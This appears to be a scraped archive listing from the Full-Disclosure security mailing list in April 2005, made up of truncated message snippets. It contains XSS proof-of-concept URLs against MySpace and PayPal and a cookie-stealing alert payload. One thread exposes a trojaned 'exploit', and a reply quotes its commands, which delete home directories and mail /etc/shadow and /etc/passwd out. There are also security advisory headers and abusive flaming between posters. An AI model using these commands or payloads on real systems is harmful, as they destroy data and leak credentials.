toss this one in...
http://www.myspace.com/index.cfm?fuseaction=find&circuitaction=search&searchType=network&interesttype=&f_first_name=http://whatismyip.com";>&Submit=Find
i think redirects are more effective in showing xss, but cookies are nice
too
or other xss like alert(document.cookie);
wood
GreyMagic Security Advisory GM#015-IE
=
By GreyMagic Software.
19 Apr 2005.
Available in HTML format at
http://www.greymagic.com/security/advisories/gm015-ie/.
Topic: File Selection May Lead to Command Execution.
Discovery date: 18 Jan 2005.
Affected applica
The following have been previously reposibly disclosed, and, because of the
lack of action taken on the venders' parts, full disclosure is necessary to
elliminate the threat of what's called "security by obscurity."
paypal.com
http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside-->ale
On Wed, 20 Apr 2005 17:35:56 PDT, Day Jay said:
> Get your "wrap-around" text fixed you fucking fed!!
> --- John McGuire <[EMAIL PROTECTED]> wrote:
Yep, must be a fed. The 'leet black hats would be posting from @fbi.gov,
and the not-so-leet ones would at least have the good taste to find a bette
On Thu, Apr 21, 2005 at 01:24:27AM +, [EMAIL PROTECTED] wrote:
> I don't think that FD is moderated.
I know it's not: there is something to be said for lists that *are* :-)
> Day Jay sounds like a real asshat, eh Steve?
Yes, quite the asshat. Funny the first time, but not the 10th.
How you
> On Wed, Apr 20, 2005 at 05:35:56PM -0700, Day Jay wrote:
> > Get your "wrap-around" text fixed you fucking fed!!
> > I'm fed up with you!!
> >
> > Jeezsus, expose yourself as such. hehehe
> >
> > dumfux
>
> I guess there's something to be said for moderated lists, eh?
I don't think th
man, that code is crap!!!
ive run that shit on all 6 of my boxes at home and it still no work.
i'm gonna try it again when i get home and if it still no work, i am going
to run some other 1337 hacker code so i can pwn.
__
On Wed, Apr 20, 2005 at 05:35:56PM -0700, Day Jay wrote:
> Get your "wrap-around" text fixed you fucking fed!!
> I'm fed up with you!!
>
> Jeezsus, expose yourself as such. hehehe
>
> dumfux
I guess there's something to be said for moderated lists, eh?
---
Stephen J Friedl | Security Consultan
Get your "wrap-around" text fixed you fucking fed!!
I'm fed up with you!!
Jeezsus, expose yourself as such. hehehe
dumfux
--- John McGuire <[EMAIL PROTECTED]> wrote:
> Touchy, touchy ;) At least people could appreciate
> the first posting as a
> decent, if fairly cruel, joke on those that run
>
Touchy, touchy ;) At least people could appreciate the first posting as a
decent, if fairly cruel, joke on those that run unknown code at the drop of
a hat. To start bitching and ranting just because your code was exposed for
what it is, though, is rather sad. I'm hoping the below posting was just
You are wrong again, it's "Smashing the Stick" you
moron. Not smashing the stack. Ask anyone here!
Man, you are such a newbie. Get a clue and stop trying
to say the sweet code is a backdoor just because you
don't know how to compile software properly. You're
nothing but a newbie wanna be C program
Yes it is you hat squad lammer newbie. Now get it to
work!! You fucking newbie.
You're so lame and so is your file system.
--- "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
wrote:
> perfect asshole
>
>
-
> class101
> Jr. Researcher
> Hat-Squ
Dear DIk,
You are thinking local buffer overflows with your
"think: ret=(int *)&ret+2;(*ret)=(int)shellcode;"
Wow, I think I read smashing the stick for fun and
profit a long time ago, but this is a remote root
exploit, it's alittle different!!
Damn newbie! I mean, how lame are you?
--- dk <[E
perfect asshole
-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "Day Jay" <[EMAIL PROTECTED]>
To:
Sent: Wednesday, April 20, 2005 8:15 PM
Subject: [
> As you know, blocking SQL injection with filters on characters is painful and
> not always successful. I got thinking about it and thought of an approach
Painful? That's just an excuse for being lazy. (No offense intended.)
Not always successful? ... I don't get this, why not?
There are a numb
Cute.
shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe"
launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk "
netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk "
On Wed, 20 Apr 2005, Day Jay wrote:
> Sorry, the previous code was broken. This code sh
Day Jay wrote:
Sorry, the previous code was broken.
Definitely `borken'... I didn't even see one /etc/passwd file in here!
Less obvious calls may catch more habitual FD code runners next time
dude. [think: ret=(int *)&ret+2;(*ret)=(int)shellcode;]
;-)
--
dk
_
that has to be like the worst backdooring ever. The printf()'s are not
even there :P
On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote:
> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
>
> =SNIP
> /* Proof of concept code
>Please don't s
Sorry, the previous code was broken. This code should
work...
Happy Owning!! :)
=SNIP
/* Proof of concept code
Please don't send us e-mails
asking us "how to hack" because
we will be forced to skullfsck you.
DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS
Hmmm ...
[Section VI. Vendor Response]
"This issue affects an extremely small subset of the McAfee
Internet Security Suite 2005 user base as the vast majority
of home users do not use non-Administrator Windows accounts"
"McAfee's key priority is the security of our customers."
RealNetworks RealPlayer/RealOne Player/Helix Player Remote Heap
Overflow
by Piotr Bania <[EMAIL PROTECTED]>
http://pb.specialised.info
Original location:
http://pb.specialised.info/all/adv/real-ram-adv.txt
Severity
Hello , all.
IE6 kicks Firefox's BUG : Local Information Disclosure.
MIME types (commonly used on the web) determine what kind of content
is being sent down and give the browser an idea of how to parse,render
or otherwise deal with the content.
"application/zip", for example, is what's sent by the
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 661-2 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 20th, 2005
-BEGIN PGP SIGNED MESSAGE-
__
SUSE Security Announcement
Package:postgresql
Announcement-ID:SUSE-SA:2005:027
Date: Wed, 2
-BEGIN PGP SIGNED MESSAGE-
__
SUSE Security Announcement
Package:RealPlayer
Announcement-ID:SUSE-SA:2005:026
Date: Wed, 2
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200504-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
26 matches
Mail list logo